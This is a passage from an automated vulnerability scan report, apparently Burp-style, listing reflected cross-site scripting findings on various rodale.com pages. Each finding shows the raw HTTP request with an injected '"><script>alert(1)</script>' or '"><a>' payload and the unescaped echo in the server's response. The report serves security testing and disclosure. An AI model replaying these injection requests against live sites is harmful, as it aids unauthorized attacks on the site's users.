Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:55 GMT
Date: Thu, 10 Mar 2011 17:20:55 GMT
Content-Length: 22495
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page corp corp-subf86f1"><a>bd8b9252f57 node node-958">
...[SNIP]...

2.148. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d183"><script>alert(1)</script>e72a4b6dfaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/1,1874,1-28,00.html1d183"><script>alert(1)</script>e72a4b6dfaf HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:21:25 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:51:26 GMT
Date: Thu, 10 Mar 2011 17:21:26 GMT
Content-Length: 22528
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/1,1874,1-28,00.html1d183"><script>alert(1)</script>e72a4b6dfaf" title="Register" class="moreLink">
...[SNIP]...

2.149. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /corp/sub/1,1874,1-28,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb43"><script>alert(1)</script>ca045b0cc82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/sub/1,1874,1-28,00.html?5cb43"><script>alert(1)</script>ca045b0cc82=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:18 GMT
Date: Thu, 10 Mar 2011 17:20:18 GMT
Content-Length: 22538
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/corp/sub/1,1874,1-28,00.html?5cb43"><script>alert(1)</script>ca045b0cc82=1" title="Register" class="moreLink">
...[SNIP]...

2.150. http://www.rodale.com/cracker-recipes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cracker-recipes

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34703"><a>678cddf4509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cracker-recipes34703"><a>678cddf4509 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:38 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:40 GMT
Date: Thu, 10 Mar 2011 17:07:41 GMT
Content-Length: 22461
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cracker-recipes34703"><a>678cddf4509 node node-958">
...[SNIP]...

2.151. http://www.rodale.com/cracker-recipes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /cracker-recipes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63322"><script>alert(1)</script>165490ecc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cracker-recipes?63322"><script>alert(1)</script>165490ecc05=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:07:38 GMT
Date: Thu, 10 Mar 2011 17:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=je675u12adkjudcpost80l2lk6; path=/; domain=.rodale.com
Content-Length: 43476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/cracker-recipes?63322"><script>alert(1)</script>165490ecc05=1&title=The+Nickel+Pincher%3A+Easy%2C+Crispy%2C+Crunchy%2C+Healthy+Cracker+Recipes">
...[SNIP]...

2.152. http://www.rodale.com/crib-safety [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /crib-safety

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16fa9"><a>e5cb521aaaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /crib-safety16fa9"><a>e5cb521aaaa HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:32 GMT
Date: Thu, 10 Mar 2011 17:05:32 GMT
Content-Length: 22449
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page crib-safety16fa9"><a>e5cb521aaaa node node-958">
...[SNIP]...

2.153. http://www.rodale.com/crib-safety [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /crib-safety

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30689"><script>alert(1)</script>1050b34adef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /crib-safety?30689"><script>alert(1)</script>1050b34adef=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:29 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:31 GMT
Date: Thu, 10 Mar 2011 17:05:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=52jl41friqh7qvffque1iaaip6; path=/; domain=.rodale.com
Content-Length: 38116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/crib-safety?30689"><script>alert(1)</script>1050b34adef=1&title=How+to+Make+Sure+Your+Baby%E2%80%99s+Crib+Is+Safe+for+Sleeping">
...[SNIP]...

2.154. http://www.rodale.com/edible-insects [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /edible-insects

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa7"><a>3f6fc0f92fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /edible-insects1dfa7"><a>3f6fc0f92fc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:21 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:24 GMT
Date: Thu, 10 Mar 2011 17:05:24 GMT
Content-Length: 22458
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page edible-insects1dfa7"><a>3f6fc0f92fc node node-958">
...[SNIP]...

2.155. http://www.rodale.com/edible-insects [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /edible-insects

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb84"><script>alert(1)</script>04fb42251cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /edible-insects?fbb84"><script>alert(1)</script>04fb42251cf=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:20 GMT
Date: Thu, 10 Mar 2011 17:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=d5h3jgshu5ihvfckki8bmpufv5; path=/; domain=.rodale.com
Content-Length: 38947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/edible-insects?fbb84"><script>alert(1)</script>04fb42251cf=1&title=Pass+the+Mealworms+Please%3A+Why+Eating+Insects+Is+a+Good+Idea">
...[SNIP]...

2.156. http://www.rodale.com/environment [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /environment

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad203"><a>7fcd599f757 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /environmentad203"><a>7fcd599f757 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:22 GMT
Date: Thu, 10 Mar 2011 17:06:22 GMT
Content-Length: 22449
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page environmentad203"><a>7fcd599f757 node node-958">
...[SNIP]...

2.157. http://www.rodale.com/environment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /environment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c02"><a>ad1ebde7751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /environment?c4c02"><a>ad1ebde7751=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:19 GMT
Date: Thu, 10 Mar 2011 17:05:19 GMT
Content-Length: 27236
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/environment?c4c02"><a>ad1ebde7751=1" title="Register" class="moreLink">
...[SNIP]...

2.158. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /files/rodalenews_favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29aae"><a>02f5b34ff2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /files29aae"><a>02f5b34ff2e/rodalenews_favicon.ico HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; _chartbeat2=rkdyf9xiaaxcx0fo

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:44:06 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:14:07 GMT
Date: Thu, 10 Mar 2011 16:44:07 GMT
Content-Length: 22529
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page files29aae"><a>02f5b34ff2e files29aae">
...[SNIP]...

2.159. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /files/rodalenews_favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3565"><a>a2980b616ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /files/rodalenews_favicon.icof3565"><a>a2980b616ce HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; _chartbeat2=rkdyf9xiaaxcx0fo

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:44:19 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43199
Expires: Fri, 11 Mar 2011 04:44:19 GMT
Date: Thu, 10 Mar 2011 16:44:20 GMT
Content-Length: 22508
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page files files-rodalenews_favicon.icof3565"><a>a2980b616ce node node-958">
...[SNIP]...

2.160. http://www.rodale.com/fitness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /fitness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcee9"><a>0759054b306 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fitnessfcee9"><a>0759054b306 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:58 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:00 GMT
Date: Thu, 10 Mar 2011 17:07:00 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page fitnessfcee9"><a>0759054b306 node node-958">
...[SNIP]...

2.161. http://www.rodale.com/fitness [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /fitness

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab5d7"><a>273e0a4586b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fitness?ab5d7"><a>273e0a4586b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:22 GMT
Date: Thu, 10 Mar 2011 17:05:22 GMT
Content-Length: 26921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/fitness?ab5d7"><a>273e0a4586b=1" title="Register" class="moreLink">
...[SNIP]...

2.162. http://www.rodale.com/food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83979"><a>a924d7e6ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /food83979"><a>a924d7e6ed3 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:31 GMT
Date: Thu, 10 Mar 2011 17:06:31 GMT
Content-Length: 22428
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page food83979"><a>a924d7e6ed3 node node-958">
...[SNIP]...

2.163. http://www.rodale.com/food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913f0"><a>a344906f9cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /food?913f0"><a>a344906f9cb=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:10 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:12 GMT
Date: Thu, 10 Mar 2011 17:05:12 GMT
Content-Length: 27356
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/food?913f0"><a>a344906f9cb=1" title="Register" class="moreLink">
...[SNIP]...

2.164. http://www.rodale.com/green-kitchen-safety-tips [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /green-kitchen-safety-tips

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d20"><a>290e132ce9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /green-kitchen-safety-tips72d20"><a>290e132ce9d HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

